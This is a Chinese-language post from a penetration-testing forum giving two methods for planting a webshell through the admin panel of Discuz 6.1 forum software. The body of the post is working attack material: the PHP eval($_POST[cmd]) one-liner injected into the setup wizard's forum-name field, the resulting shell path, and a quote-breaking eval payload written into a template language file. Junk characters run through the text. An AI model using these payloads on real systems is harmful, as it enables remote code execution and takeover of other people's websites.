中国网络渗透测试联盟

标题: discuz6.1后台拿shell方法 [打印本页]
作者: admin    时间: 2012-9-13 16:59
标题: discuz6.1后台拿shell方法
discuz6.1两种方法后台拿shell
$ L$ L+ Q  E* k8 x8 M: A好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下6 X  Z4 q5 ^6 T" z9 `
1:
. V6 I5 d6 C+ p& G& \6 xhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes( e4 {% a2 M: ?# |& D1 [3 }
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell- X( z5 l5 v7 O' N+ a& ^8 F
<?php eval($_POST[cmd]);?>
* \' H& |1 \2 K8 T- w后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php" y( e& {; k# J. _. Z4 P
& |+ O+ Z0 m  m8 X% J0 w4 ^
" H4 P$ N2 J8 {7 h! o
2:后台模板管理--默认模板套系--详情/ z' H7 l5 n. W7 z- y
templates/default/actions.lang.php
  [- x& ]* t, W7 ]0 ujhackj\\');eval($_POST[cmd])?>;//5 `% r( s; t0 j. F) H# |

. }. M& V& K$ B* l利用很简单,聪明的人一看就懂了



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2